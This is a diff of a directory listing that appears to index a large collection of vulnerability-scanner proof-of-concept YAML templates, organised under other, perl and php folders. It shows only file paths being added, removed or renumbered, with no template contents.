./poc/other/resim-ara-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/resim-ara-plugin.yaml ./poc/other/resim-ara.yaml -./poc/other/resin-inputfile-fileread-9868.yaml ./poc/other/resin-inputfile-fileread-9869.yaml +./poc/other/resin-inputfile-fileread-9870.yaml ./poc/other/resin-inputfile-fileread-9871.yaml ./poc/other/resin-viewfile-fileread.yaml ./poc/other/resin-viewfile-fileread.yml ./poc/other/resin-viewfile-lfr-9872.yaml ./poc/other/resin-viewfile-lfr-9873.yaml ./poc/other/resin-viewfile-lfr-9875.yaml +./poc/other/resin-viewfile-lfr.yaml ./poc/other/resmushit-image-optimizer-55e816cb631a172f3433d28be371bf4d.yaml ./poc/other/resmushit-image-optimizer-8e138d835c51d3c6720b941fe121d84e.yaml ./poc/other/resmushit-image-optimizer-949bb7e530ea361fdff18bd3807a94ad.yaml 
@@ -74206,7 +74185,7 @@ ./poc/other/robots-9887.yaml ./poc/other/robots-9889.yaml ./poc/other/robots-txt-9886.yaml -./poc/other/robots-txt-9890.yaml +./poc/other/robots-txt-9888.yaml ./poc/other/robots-txt-endpoint.yaml ./poc/other/robots-txt.yaml ./poc/other/robots.txt.yaml @@ -74405,6 +74384,7 @@ ./poc/other/ruijie-cloud.yaml ./poc/other/ruijie-eg-file-read.yaml ./poc/other/ruijie-eg-file-read.yml +./poc/other/ruijie-eg-filedown.yaml ./poc/other/ruijie-eg-info-leak.yml ./poc/other/ruijie-eg易网关.yaml ./poc/other/ruijie-it.yaml @@ -74700,7 +74680,7 @@ ./poc/other/scrollsequence.yaml ./poc/other/scs-landfill-control-10095.yaml ./poc/other/scs-landfill-control-10096.yaml -./poc/other/scs-landfill-control-10098.yaml +./poc/other/scs-landfill-control-10097.yaml ./poc/other/scs-landfill-control.yaml ./poc/other/scv1-119cdc16fe916df3add67c8763d4fc01.yaml ./poc/other/scv1-31fa1f0e3c61b1f050d66cb517e56e41.yaml @@ -74767,13 +74747,13 @@ ./poc/other/secure-html5-video-player.yaml ./poc/other/securemoz-security-audit-5934c9784ef1b47d3135045450f457ae.yaml ./poc/other/securemoz-security-audit.yaml -./poc/other/securenvoy-panel-10114.yaml ./poc/other/securenvoy-panel-10115.yaml +./poc/other/securenvoy-panel-10116.yaml ./poc/other/securenvoy-panel.yaml -./poc/other/securepoint-utm-10117.yaml +./poc/other/securepoint-utm-10118.yaml ./poc/other/securepoint-utm.yaml ./poc/other/security-10122.yaml -./poc/other/security-10123.yaml +./poc/other/security-10124.yaml ./poc/other/security-intelligent-management-platform.yaml ./poc/other/security-malware-firewall-45c526c3982a209b165f42c75f6d6d27.yaml ./poc/other/security-malware-firewall-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -74809,7 +74789,6 @@ ./poc/other/selea-ip-camera-10133.yaml ./poc/other/selea-ip-camera-10134.yaml ./poc/other/selea-ip-camera-10135.yaml -./poc/other/selea-ip-camera-10136.yaml ./poc/other/selea-ip-camera.yaml ./poc/other/selea-targa-camera-read-file.yaml ./poc/other/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons-eca8b18a10526011571b2fa3e9fc94f6.yaml @@ -74820,6 +74799,7 @@ ./poc/other/self-contained.yaml ./poc/other/self-signed-cert.yaml ./poc/other/self-signed-ssl.yaml +./poc/other/selfcheck-panel.yaml ./poc/other/selio-47217d68dcdf61df30873286a6bbc681.yaml ./poc/other/selio-4a816a5156ab7c9cc5ec9ab45afebe2d.yaml ./poc/other/selio-5ace739a5952774d63f1bf788e169f28.yaml @@ -75040,7 +75020,7 @@ ./poc/other/server-status-by-hostnameip.yaml ./poc/other/server-status-localhost-10163.yaml ./poc/other/server-status-localhost-10164.yaml -./poc/other/server-status-localhost-10165.yaml +./poc/other/server-status-localhost-10166.yaml ./poc/other/server-status-localhost.yaml ./poc/other/servfail-refused-hosts-10167.yaml ./poc/other/servfail-refused-hosts-10168.yaml @@ -75166,9 +75146,9 @@ ./poc/other/shell-history-1.yaml ./poc/other/shell-history-10191.yaml ./poc/other/shell-history-10192.yaml -./poc/other/shell-history-10193.yaml ./poc/other/shell-history-2.yaml ./poc/other/shell-history-3.yaml +./poc/other/shell-history.yaml ./poc/other/shell_scripts.yaml ./poc/other/shells.yaml ./poc/other/shellscripts-1.yaml @@ -75392,10 +75372,10 @@ ./poc/other/sidebar-manager.yaml ./poc/other/sideblog-de06c6cd776a8d198247303108ff7a16.yaml ./poc/other/sideblog.yaml -./poc/other/sidekiq-dashboard-10235.yaml ./poc/other/sidekiq-dashboard-10236.yaml ./poc/other/sidekiq-dashboard-10237.yaml ./poc/other/sidekiq-dashboard-10238.yaml +./poc/other/sidekiq-dashboard-10239.yaml ./poc/other/sidekiq-dashboard.yaml ./poc/other/sidekiq-workflow.yaml ./poc/other/signal-phish.yaml 
@@ -75428,6 +75408,7 @@ ./poc/other/signatures-10265.yaml ./poc/other/signatures-10266.yaml ./poc/other/signatures-10267.yaml +./poc/other/signatures-10268.yaml ./poc/other/signatures-10269.yaml ./poc/other/signatures-10270.yaml ./poc/other/signatures.yaml @@ -75970,7 +75951,6 @@ ./poc/other/sitemap-by-click5-bb55523a8065ab01450d6332a0f9b83d.yaml ./poc/other/sitemap-by-click5.yaml ./poc/other/sitemap-index.yaml -./poc/other/sitemap.yaml ./poc/other/siteminderagent.yaml ./poc/other/siteorigin-panels-0c18557898a1d94d25aeb04bcb7e7891.yaml ./poc/other/siteorigin-panels-20b6552057669c22e92f742a513eab73.yaml @@ -76006,8 +75986,8 @@ ./poc/other/sky-elementor-addons-a77d646b0ca65be83cef4a1196433a63.yaml ./poc/other/sky-elementor-addons.yaml ./poc/other/sky-phish.yaml -./poc/other/skycaiji-admin-panel-10304.yaml ./poc/other/skycaiji-admin-panel-10305.yaml +./poc/other/skycaiji-admin-panel-10306.yaml ./poc/other/skycaiji-admin-panel.yaml ./poc/other/skycaiji-install-10308.yaml ./poc/other/skycaiji-install-10309.yaml @@ -76342,7 +76322,6 @@ ./poc/other/soft78-system.yaml ./poc/other/softbiz-online-auctions-script.yaml ./poc/other/softbiz-online-classifieds.yaml -./poc/other/softether-vpn-panel.yaml ./poc/other/softether-vpn.yaml ./poc/other/softnext-spam-sqr反垃圾邮件系统.yaml ./poc/other/softnext-spam.yaml @@ -76367,8 +76346,8 @@ ./poc/other/solarview-compact-panel.yaml ./poc/other/solarview-compact.yaml ./poc/other/solarwinds-arm-panel.yaml +./poc/other/solarwinds-orion-10357.yaml ./poc/other/solarwinds-orion-10358.yaml -./poc/other/solarwinds-orion-10359.yaml ./poc/other/solarwinds-orion-panel.yaml ./poc/other/solarwinds-orion-workflow.yaml ./poc/other/solarwinds-orion.yaml 
@@ -76393,18 +76372,19 @@ ./poc/other/solr-admin-query.yaml ./poc/other/solr-file-read.yaml ./poc/other/solr-fileRead.yaml +./poc/other/solr-fileread.yaml ./poc/other/solr-fileread.yml ./poc/other/solr-query-dashboard-1.yaml ./poc/other/solr-query-dashboard-10367.yaml +./poc/other/solr-query-dashboard-10368.yaml ./poc/other/solr-query-dashboard-10369.yaml ./poc/other/solr-query-dashboard-10370.yaml ./poc/other/solr-query-dashboard-2.yaml -./poc/other/solr-query-dashboard.yaml ./poc/other/solr-workflow.yaml ./poc/other/some-PIIs.yaml ./poc/other/sonarcloud.yaml +./poc/other/sonarqube-public-projects-10377.yaml ./poc/other/sonarqube-public-projects-10378.yaml -./poc/other/sonarqube-public-projects-10379.yaml ./poc/other/sonarqube-public-projects.yaml ./poc/other/sonarqube-workflow.yaml ./poc/other/sonarqube.yaml @@ -76414,13 +76394,14 @@ ./poc/other/sonicwall-management-panel.yaml ./poc/other/sonicwall-shellshock-vulnerability.yaml ./poc/other/sonicwall-ssl-vpn.yaml +./poc/other/sonicwall-sslvpn-panel-10388.yaml ./poc/other/sonicwall-sslvpn-panel-10389.yaml -./poc/other/sonicwall-sslvpn-panel-10390.yaml ./poc/other/sonicwall-sslvpn-panel.yaml ./poc/other/sonicwall-sslvpn-shellshock-10391.yaml ./poc/other/sonicwall-sslvpn-shellshock-10392.yaml ./poc/other/sonicwall-sslvpn-shellshock-10393.yaml ./poc/other/sonicwall-sslvpn-shellshock-10394.yaml +./poc/other/sonicwall-sslvpn-shellshock-10395.yaml ./poc/other/sony-camera-backdoor.yaml ./poc/other/sony-liv.yaml ./poc/other/sophi-4afed2941162d2b455634089bfa7fe66.yaml @@ -76582,6 +76563,7 @@ ./poc/other/speedycache-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/speedycache-plugin.yaml ./poc/other/speedycache.yaml +./poc/other/sphinxonline-panel.yaml ./poc/other/spice-post-slider-347b7b133c5bc03f847b0cc6cd76824f.yaml ./poc/other/spice-post-slider.yaml ./poc/other/spice-software-157cf14a019f2f39567d396451ba436d.yaml 
@@ -76619,7 +76601,6 @@ ./poc/other/spideranalyse.yaml ./poc/other/spidercontrol-scada-server-info-10411.yaml ./poc/other/spidercontrol-scada-server-info-10412.yaml -./poc/other/spidercontrol-scada-server-info-10413.yaml ./poc/other/spidercontrol-scada-server-info.yaml ./poc/other/spiderfoot.yaml ./poc/other/spidermag-236bed5b5a49a6173251e991d6ca44d1.yaml @@ -76658,7 +76639,6 @@ ./poc/other/split-test-for-elementor-bde4325200fb2f444fb8a10edf1336f9.yaml ./poc/other/split-test-for-elementor.yaml ./poc/other/splunk-enterprise-panel-10414.yaml -./poc/other/splunk-enterprise-panel-10415.yaml ./poc/other/splunk-enterprise-panel.yaml ./poc/other/splunk-workflow.yaml ./poc/other/splunk.yaml @@ -76669,7 +76649,7 @@ ./poc/other/sponsors-carousel-41040133b76cc5bfa7e90c541b024423.yaml ./poc/other/sponsors-carousel.yaml ./poc/other/spoofable-mail-missingdmarc.yaml -./poc/other/spoofable-spf-records-ptr-10425.yaml +./poc/other/spoofable-spf-records-ptr-10424.yaml ./poc/other/spoofable-spf-records-ptr-10426.yaml ./poc/other/spoofable-spf-records-ptr-10427.yaml ./poc/other/sportspress-ae19df4693862355cf869714c073d0eb.yaml @@ -77210,12 +77190,10 @@ ./poc/other/supermap-iserver.yaml ./poc/other/supermicro-bmc-panel-old.yaml ./poc/other/supermicro-bmc-panel.yaml -./poc/other/supershell-c2.yaml ./poc/other/superv-meeting.yaml ./poc/other/supervisord.yaml ./poc/other/supervpn-panel-10575.yaml ./poc/other/supervpn-panel-10576.yaml -./poc/other/supervpn-panel-10577.yaml ./poc/other/supervpn-panel.yaml ./poc/other/support-genix-lite-64c576dc3e88ee994a3bf9f765a979d3.yaml ./poc/other/support-genix-lite.yaml 
@@ -77383,7 +77361,7 @@ ./poc/other/symantec-messaging-gateway-10607.yaml ./poc/other/symantec-messaging-gateway-10608.yaml ./poc/other/symantec-messaging-gateway-10609.yaml -./poc/other/symantec-messaging-gateway-10610.yaml +./poc/other/symantec-pgp-global-directory-10611.yaml ./poc/other/symantec-pgp-global-directory-10612.yaml ./poc/other/symantec-pgp-global-directory-10613.yaml ./poc/other/symantec-pgp-global-directory.yaml @@ -77426,7 +77404,6 @@ ./poc/other/synology-diskstation-nas.yaml ./poc/other/synology-photo-station.yaml ./poc/other/synology-router-manager.yaml -./poc/other/synopsys-coverity-panel.yaml ./poc/other/syntax-checking-10633.yaml ./poc/other/syntax-checking-10634.yaml ./poc/other/syntax-checking.yaml @@ -77484,6 +77461,7 @@ ./poc/other/tablesome-dc53a007f160e75fd224d604cb3a0711.yaml ./poc/other/tablesome.yaml ./poc/other/tabnabbing-check-10645.yaml +./poc/other/tabnabbing-check-10646.yaml ./poc/other/tabnabbing-check.yaml ./poc/other/taboola-5cde13fe6662d7d9b24cd4265d596789.yaml ./poc/other/taboola.yaml @@ -77606,8 +77584,9 @@ ./poc/other/team-showcase-supreme.yaml ./poc/other/team-showcase.yaml ./poc/other/team.yaml -./poc/other/teamcity-registration-enabled-10667.yaml +./poc/other/teamcity-registration-enabled.yaml ./poc/other/teamdoc-filesystem.yaml +./poc/other/teamforge-panel.yaml ./poc/other/teampass-panel.yaml ./poc/other/teamviewer-phish.yaml ./poc/other/teamviewer.yaml @@ -77627,6 +77606,7 @@ ./poc/other/tectuus-scada-monitor-10682.yaml ./poc/other/tectuus-scada-monitor.yaml ./poc/other/tekon-info-leak-10684.yaml +./poc/other/tekon-info-leak-10685.yaml ./poc/other/tekton-dashboard.yaml ./poc/other/telefication-1c7925e1a8107c9a8d402138b26021c6.yaml ./poc/other/telefication.yaml 
@@ -77701,13 +77681,12 @@ ./poc/other/teradici-pcoip-10704.yaml ./poc/other/teradici-pcoip-panel.yaml ./poc/other/teradici-pcoip-zero-client.yaml -./poc/other/teradici-pcoip.yaml ./poc/other/terillion-reviews-b491b4d5351fea9f098fb4edcecd04c9.yaml ./poc/other/terillion-reviews.yaml ./poc/other/terminal-feature-collection-and-control-system.yaml ./poc/other/terraclassifieds-535145ab999d35b4feced2028968ea53.yaml ./poc/other/terraclassifieds.yaml -./poc/other/terraform-enterprise-panel-10710.yaml +./poc/other/terraform-enterprise-panel-10711.yaml ./poc/other/terraform-enterprise-panel-10712.yaml ./poc/other/terraform-enterprise-panel.yaml ./poc/other/terramaster-workflow.yaml @@ -78038,15 +78017,14 @@ ./poc/other/thinkadmin-workflow.yaml ./poc/other/thinkadmin.yaml ./poc/other/thinkcmf-arbitary.yaml -./poc/other/thinkcmf-arbitrary-code-execution-10715.yaml ./poc/other/thinkcmf-arbitrary-code-execution-10716.yaml +./poc/other/thinkcmf-arbitrary-code-execution.yaml ./poc/other/thinkcmf-file-include.yaml ./poc/other/thinkcmf-workflow-10730.yaml ./poc/other/thinkcmf-workflow-10731.yaml ./poc/other/thinkcmf-write-shell.yaml ./poc/other/thinkcmf-write-shell.yml ./poc/other/thinkcmf.yaml -./poc/other/thinkcmf_include.yaml ./poc/other/thinker-intelligentgateway.yaml ./poc/other/thinkmail.yaml ./poc/other/thinkox.yaml @@ -78129,6 +78107,7 @@ ./poc/other/tianqing-info-leak.yaml ./poc/other/tianqing-info-leak.yml ./poc/other/tianyang-bpm-system.yaml +./poc/other/tibco-spotfire-panel.yaml ./poc/other/ticker-ultimate-7851c267c5129958224bd7b0d064e1e0.yaml ./poc/other/ticker-ultimate.yaml ./poc/other/tickera-event-ticketing-system-0e2339661545e817b8840235d57493ae.yaml @@ -78159,6 +78138,7 @@ ./poc/other/tiempocom.yaml ./poc/other/tier-pricing-table-2eb2ad93209e7797221e4672f0518887.yaml ./poc/other/tier-pricing-table.yaml +./poc/other/tigase-xmpp-server.yaml ./poc/other/tiger-form-a9c7778b2c1fe12201c4414e46e5cfe7.yaml ./poc/other/tiger-form.yaml ./poc/other/tiger-ip-connect.yaml 
@@ -78171,6 +78151,7 @@ ./poc/other/tileserver-gl-10785.yaml ./poc/other/tileserver-gl-10786.yaml ./poc/other/tileserver-gl-10787.yaml +./poc/other/tileserver-gl.yaml ./poc/other/timber-library-63f508e564b8a4abe97afab9c4153993.yaml ./poc/other/timber-library.yaml ./poc/other/time-sheets-01c399115e5a14d0d02b21cc32dc4267.yaml @@ -78356,7 +78337,6 @@ ./poc/other/topsec-vpn.yaml ./poc/other/topwalk-mtp.yaml ./poc/other/tor-socks-proxy-10810.yaml -./poc/other/tor-socks-proxy-10811.yaml ./poc/other/tor-socks-proxy-10812.yaml ./poc/other/tor-socks-proxy-10813.yaml ./poc/other/tor-socks-proxy.yaml @@ -78447,8 +78427,8 @@ ./poc/other/tradetracker-store.yaml ./poc/other/trading212-phish.yaml ./poc/other/tradingeye.yaml -./poc/other/traefik-dashboard-10832.yaml ./poc/other/traefik-dashboard-10833.yaml +./poc/other/traefik-dashboard-10834.yaml ./poc/other/traefik-dashboard.yaml ./poc/other/traefik-workflow.yaml ./poc/other/traefik.yaml @@ -78622,9 +78602,9 @@ ./poc/other/tutor-pro.yaml ./poc/other/tutor.yaml ./poc/other/tutortrac.yaml +./poc/other/tuxedo-connected-controller-10852.yaml ./poc/other/tuxedo-connected-controller-10853.yaml ./poc/other/tuxedo-connected-controller-10854.yaml -./poc/other/tuxedo-connected-controller-10855.yaml ./poc/other/tuxedo-connected-controller.yaml ./poc/other/twchat-1e11041979895de79516b21f580cfdc5.yaml ./poc/other/twchat-66860598cfdc267acba6e015a017bc01.yaml @@ -79299,12 +79279,11 @@ ./poc/other/upfiv-complete-all-in-one-seo-wizard.yaml ./poc/other/upnp-device-10980.yaml ./poc/other/upnp-device-10981.yaml -./poc/other/upnp-device-10982.yaml ./poc/other/upnp-device.yaml ./poc/other/uportal.yaml ./poc/other/ups-status-1.yaml -./poc/other/ups-status-10983.yaml ./poc/other/ups-status-10984.yaml +./poc/other/ups-status-10985.yaml ./poc/other/ups-status-2.yaml ./poc/other/upscale-179320c05c6c92e9b26b9cab26bf1bc3.yaml ./poc/other/upscale-8525917b8f35bb4eaf3e210e14fd7fa5.yaml 
@@ -79719,7 +79698,6 @@ ./poc/other/verge3d.yaml ./poc/other/verification-code-for-comments-402d5d368961e0883801cefc4dd8562b.yaml ./poc/other/verification-code-for-comments.yaml -./poc/other/veriz0wn-osint.yaml ./poc/other/verizon-router-panel.yaml ./poc/other/vernemq-status-page.yaml ./poc/other/vernemq-status.yaml @@ -80086,8 +80064,7 @@ ./poc/other/void-elementor-whmcs-elements-15e54a1af569e89032ac0ee0b704f8b0.yaml ./poc/other/void-elementor-whmcs-elements.yaml ./poc/other/voipmonitor-panel.yaml -./poc/other/voipmonitor-workflow-11065.yaml -./poc/other/voipmonitor-workflow.yaml +./poc/other/voipmonitor-workflow-11064.yaml ./poc/other/vop.yaml ./poc/other/vos-vos2009.yaml ./poc/other/votecount-for-balatarin-c9ee335a6e160eeeadce2a3c276f2f36.yaml @@ -80235,7 +80212,7 @@ ./poc/other/walk-score.yaml ./poc/other/walker-core-c9d28ba9af7ff1cee52a47de51a62b8e.yaml ./poc/other/walker-core.yaml -./poc/other/wallix-accessmanager-panel-11094.yaml +./poc/other/wallix-accessmanager-panel-11095.yaml ./poc/other/wallix-accessmanager-panel.yaml ./poc/other/wallstreet-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/wallstreet-7cccc28e1315b459e8b12f665a5d26e3.yaml @@ -80325,7 +80302,7 @@ ./poc/other/wavetop-days.yaml ./poc/other/wayos-panel.yaml ./poc/other/wayos维盟ac集中管理系统.yaml -./poc/other/wazuh-panel-11113.yaml +./poc/other/wazuh-panel-11114.yaml ./poc/other/wazuh-panel.yaml ./poc/other/wbcom-designs-buddypress-ads-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/wbcom-designs-buddypress-ads-edc227605cbf113bcdfd09c53dfc5da4.yaml @@ -80699,7 +80676,7 @@ ./poc/other/winterlock.yaml ./poc/other/winters.yaml ./poc/other/wireless-access-point-controller.yaml -./poc/other/wireless-leakage(1).yaml +./poc/other/wireless-leakage.yaml ./poc/other/wise-361b4625da00651d196bf168b5902896.yaml ./poc/other/wise-9099a88f255af571eb05254581f8054d.yaml ./poc/other/wise-chat-8c10bb16c734c3ae0e0598296078da6b.yaml 
@@ -81370,6 +81347,7 @@ ./poc/other/wooyun-2015-093724.yaml ./poc/other/wooyun-2015-096676.yaml ./poc/other/wooyun-2015-097832.yaml +./poc/other/wooyun-2015-148227(1).yaml ./poc/other/wooyun-2015-148227-11224.yaml ./poc/other/wooyun-2015-148227-11225.yaml ./poc/other/wooyun-2015-148227-11226.yaml @@ -81472,7 +81450,7 @@ ./poc/other/workscout.yaml ./poc/other/workspace-one-uem-11391.yaml ./poc/other/workspace-one-uem-11392.yaml -./poc/other/workspace-one-uem-11393.yaml +./poc/other/workspace-one-uem-11394.yaml ./poc/other/workspace-one-uem.yaml ./poc/other/workspaceone-uem-dashboard-11390.yaml ./poc/other/workspaceone-uem-dashboard.yaml @@ -81511,7 +81489,6 @@ ./poc/other/wowza-streaming-engine-11396.yaml ./poc/other/wowza-streaming-engine-11397.yaml ./poc/other/wowza-streaming-engine-11398.yaml -./poc/other/wowza-streaming-engine-11399.yaml ./poc/other/wowza-streaming-engine.yaml ./poc/other/wowza-wowzastreamingengine.yaml ./poc/other/wr-age-verification-40b3c90da10d9246a3d45605cfab9759.yaml @@ -81562,14 +81539,13 @@ ./poc/other/wsm-downloader.yaml ./poc/other/wsncm-iot.yaml ./poc/other/wsncm-system.yaml -./poc/other/wso2-2019-0598-11635.yaml ./poc/other/wso2-2019-0598-11636.yaml ./poc/other/wso2-carbon-server.yaml -./poc/other/wso2-management-console-11644.yaml ./poc/other/wso2-management-console-11645.yaml ./poc/other/wso2-management-console-11646.yaml +./poc/other/wso2-management-console-11647.yaml ./poc/other/wso2-management-console.yaml -./poc/other/wso2mgmtconsole(1).yaml +./poc/other/wso2mgmtconsole.yaml ./poc/other/wstmart.yaml ./poc/other/wti-like-post-801384ebb6b98e29bbc3da65ee0914d2.yaml ./poc/other/wti-like-post-c854ddc867a3e00f9bba9d6f39d622e4.yaml @@ -81762,6 +81738,7 @@ ./poc/other/yarn-lock-11727.yaml ./poc/other/yarn-lock-11729.yaml ./poc/other/yarn-lock-11730.yaml +./poc/other/yarn-lock.yaml ./poc/other/yatra-cbaa3d03ba7367a64c11c6690f1f36b8.yaml ./poc/other/yatra.yaml ./poc/other/yatri-tools-45a4d9b5b716af9eb5f5cf5c683a0860.yaml 
@@ -81844,6 +81821,7 @@ ./poc/other/yml-for-yandex-market.yaml ./poc/other/yongyou-ELTextFile.yaml ./poc/other/yongyou-changjietong-EFI.yaml +./poc/other/yongyou-eltextfile.yaml ./poc/other/yongyou-fileRead.yaml ./poc/other/yonyou-chanjet-tplus-downloadproxy-filedownload.yaml ./poc/other/yonyou-chanjet-tplus-getdecallusers-infoleak.yaml @@ -81895,7 +81873,7 @@ ./poc/other/yop-poll-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/yop-poll-plugin.yaml ./poc/other/yop-poll.yaml -./poc/other/yopass-panel-11749.yaml +./poc/other/yopass-panel-11750.yaml ./poc/other/yopass-panel.yaml ./poc/other/yottabyte-rizhiyi.yaml ./poc/other/you-shang-3047371f5c7a9995238b090856ba5be3.yaml @@ -82115,8 +82093,9 @@ ./poc/other/zhiyuan-fileRead.yaml ./poc/other/zhiyuan-oa-info-leak-11797.yaml ./poc/other/zhiyuan-oa-info-leak-11798.yaml -./poc/other/zhiyuan-oa-info-leak-11800.yaml +./poc/other/zhiyuan-oa-info-leak-11799.yaml ./poc/other/zhongan-xdecision.yaml +./poc/other/zhongkewangwei-fileread.yaml ./poc/other/zhongshengsoft-crm.yaml ./poc/other/zhongtan-ndstart.yaml ./poc/other/zhongyou-system.yaml @@ -82246,6 +82225,7 @@ ./poc/other/zte-zxsec统一安全网关.yaml ./poc/other/zuitu.yaml ./poc/other/zuul-panel-11842.yaml +./poc/other/zuul-panel-11843.yaml ./poc/other/zuul-panel.yaml ./poc/other/zuul-panel.yml ./poc/other/zwave2mqtt-health-check.yaml @@ -82444,6 +82424,7 @@ ./poc/perl/perl-scanner.yaml ./poc/perl/perl-status-9485.yaml ./poc/perl/perl-status-9486.yaml +./poc/perl/perl-status-9487.yaml ./poc/perl/perl-status-page.yaml ./poc/perl/superlist-5da18e3bfe18177f7ef82fb6ae815fe6.yaml ./poc/perl/superlist-ca628bb2dee1036910f5dc781a4bf2d7.yaml @@ -82510,6 +82491,7 @@ ./poc/php/bohuangwanglong-cmd-php-rce.yaml ./poc/php/bsphp-nauthorized-access.yaml ./poc/php/btoptionscom-hbr_php-sqli.yaml +./poc/php/clockwork-php-page-1016.yaml ./poc/php/clockwork-php-page-1017.yaml ./poc/php/clockwork-php-page-1018.yaml ./poc/php/clockwork-php-page-1019.yaml 
@@ -82573,7 +82555,7 @@ ./poc/php/php-backup-files-7.yaml ./poc/php/php-backup-files-8.yaml ./poc/php/php-backup-files-9.yaml -./poc/php/php-backup-files-9497.yaml +./poc/php/php-backup-files-9498.yaml ./poc/php/php-backup-files.yaml ./poc/php/php-cgi-cve-2012-1823.yml ./poc/php/php-cloud.yaml @@ -82590,9 +82572,7 @@ ./poc/php/php-errors-9508.yaml ./poc/php/php-errors-9509.yaml ./poc/php/php-errors-9510.yaml -./poc/php/php-errors-9511.yaml ./poc/php/php-errors-9512.yaml -./poc/php/php-errors.yaml ./poc/php/php-event-calendar-12517f8593a63dbf79626b073a1f1de2.yaml ./poc/php/php-event-calendar-4c41621f6e7b56d3c4fdd926d807fd58.yaml ./poc/php/php-event-calendar-abf62654d5558f36cc7e98af2469b42e.yaml @@ -82620,9 +82600,9 @@ ./poc/php/php-proxy-detect-1.yaml ./poc/php/php-proxy-detect-2.yaml ./poc/php/php-proxy-detect-9544.yaml -./poc/php/php-proxy-detect.yaml ./poc/php/php-scanner-9546.yaml ./poc/php/php-scanner-9547.yaml +./poc/php/php-scanner.yaml ./poc/php/php-server-monitor.yaml ./poc/php/php-shell-0771e0dee276537bea17fe994946d6c2.yaml ./poc/php/php-shell-aa4a6da32c1b252d9d4bc241fb9c858f.yaml @@ -82650,11 +82630,10 @@ ./poc/php/php-warning-9562.yaml ./poc/php/php-warning-9563.yaml ./poc/php/php-warning.yaml -./poc/php/php-zerodium-backdoor-rce-9569.yaml ./poc/php/php-zerodium-backdoor-rce-9570.yaml ./poc/php/php-zerodium-backdoor-rce-9571.yaml +./poc/php/php-zerodium-backdoor-rce-9572.yaml ./poc/php/php-zerodium-backdoor-rce-9573.yaml -./poc/php/php-zerodium-backdoor-rce.yaml ./poc/php/php-zerodium-backdoor.yaml ./poc/php/php.yaml ./poc/php/php168cms.yaml @@ -82664,10 +82643,11 @@ ./poc/php/phpbb.yaml ./poc/php/phpcms-cve-2018-19127.yml ./poc/php/phpcms.yaml +./poc/php/phpcollab-detect-9499.yaml ./poc/php/phpcollab-detect-9500.yaml ./poc/php/phpcollab-detect.yaml ./poc/php/phpcollab-panel.yaml -./poc/php/phpcollab-workflow-9503.yaml +./poc/php/phpcollab-workflow-9502.yaml ./poc/php/phpcollab-workflow.yaml ./poc/php/phpcollab.yaml ./poc/php/phpdealerlocator.yaml 
@@ -82697,7 +82677,6 @@ ./poc/php/phpinfo-9517.yaml ./poc/php/phpinfo-9518.yaml ./poc/php/phpinfo-9519.yaml -./poc/php/phpinfo-9520.yaml ./poc/php/phpinfo-9521.yaml ./poc/php/phpinfo-9522.yaml ./poc/php/phpinfo-disclosure-env.yaml @@ -82707,6 +82686,7 @@ ./poc/php/phpinfo-wp.yaml ./poc/php/phpinfo.yaml ./poc/php/phpldap-admin.yaml +./poc/php/phpldapadmin-panel.yaml ./poc/php/phpldapadmin-xss.yaml ./poc/php/phpldapadmin.yaml ./poc/php/phplist-邮件系统.yaml @@ -82740,12 +82720,11 @@ ./poc/php/phpmyadmin-setup-11857.yaml ./poc/php/phpmyadmin-setup-9529.yaml ./poc/php/phpmyadmin-setup-9530.yaml -./poc/php/phpmyadmin-setup-9531.yaml +./poc/php/phpmyadmin-setup-9532.yaml ./poc/php/phpmyadmin-setup-9533.yaml ./poc/php/phpmyadmin-setup-deserialization.yaml ./poc/php/phpmyadmin-setup-deserialization.yml ./poc/php/phpmyadmin-setup.yaml -./poc/php/phpmyadmin-sql-9534.yaml ./poc/php/phpmyadmin-sql-9535.yaml ./poc/php/phpmyadmin-sql-9536.yaml ./poc/php/phpmyadmin-sql.php-server-1.yaml @@ -82792,11 +82771,11 @@ ./poc/php/phpsword-favicon-manager.yaml ./poc/php/phpsysinfo.yaml ./poc/php/phpunit-9555.yaml +./poc/php/phpunit-9556.yaml ./poc/php/phpunit-9557.yaml ./poc/php/phpunit-9558.yaml ./poc/php/phpunit-cve-2017-9841-rce.yml ./poc/php/phpunit-result-cache-exposure.yaml -./poc/php/phpunit.yaml ./poc/php/phpweb.yaml ./poc/php/phpwiki-lfi-9564.yaml ./poc/php/phpwiki-lfi-9565.yaml 
@@ -82840,18 +82819,17 @@ ./poc/php/symfony-phpinfo.yaml ./poc/php/thinkphp-2-rce-10738.yaml ./poc/php/thinkphp-2-rce-10739.yaml -./poc/php/thinkphp-2-rce-10740.yaml ./poc/php/thinkphp-2-rce-10741.yaml ./poc/php/thinkphp-30-rce.yaml ./poc/php/thinkphp-50-rce.yaml ./poc/php/thinkphp-501-rce-10742.yaml -./poc/php/thinkphp-501-rce-10743.yaml +./poc/php/thinkphp-501-rce.yaml ./poc/php/thinkphp-5010-rce.yaml ./poc/php/thinkphp-5022-5129-rce.yaml +./poc/php/thinkphp-5022-rce-10744.yaml ./poc/php/thinkphp-5022-rce-10745.yaml ./poc/php/thinkphp-5022-rce-10746.yaml -./poc/php/thinkphp-5022-rce.yaml -./poc/php/thinkphp-5023-rce-10748.yaml +./poc/php/thinkphp-5022-rce-10747.yaml ./poc/php/thinkphp-5023-rce-10749.yaml ./poc/php/thinkphp-5023-rce-10750.yaml ./poc/php/thinkphp-5023-rce-10751.yaml @@ -82859,7 +82837,6 @@ ./poc/php/thinkphp-509-information-disclosure-10752.yaml ./poc/php/thinkphp-509-information-disclosure-10753.yaml ./poc/php/thinkphp-509-information-disclosure-10754.yaml -./poc/php/thinkphp-509-information-disclosure-10755.yaml ./poc/php/thinkphp-509-information-disclosure.yaml ./poc/php/thinkphp-50x-arbitrary-file-read.yaml ./poc/php/thinkphp-controller-rce.yml @@ -82890,6 +82867,7 @@ ./poc/php/tongda-oa-v2017-video-file-php-filedownload.yaml ./poc/php/tongda-oa-wbupload-php-fileupload.yaml ./poc/php/tosec-jumpserver-admin-php-sqli.yaml +./poc/php/twig-php-ssti-10856.yaml ./poc/php/twig-php-ssti-10857.yaml ./poc/php/twig-php-ssti-10858.yaml ./poc/php/twig-php-ssti-10859.yaml @@ -82913,7 +82891,6 @@ ./poc/php/wp-livephp.yaml 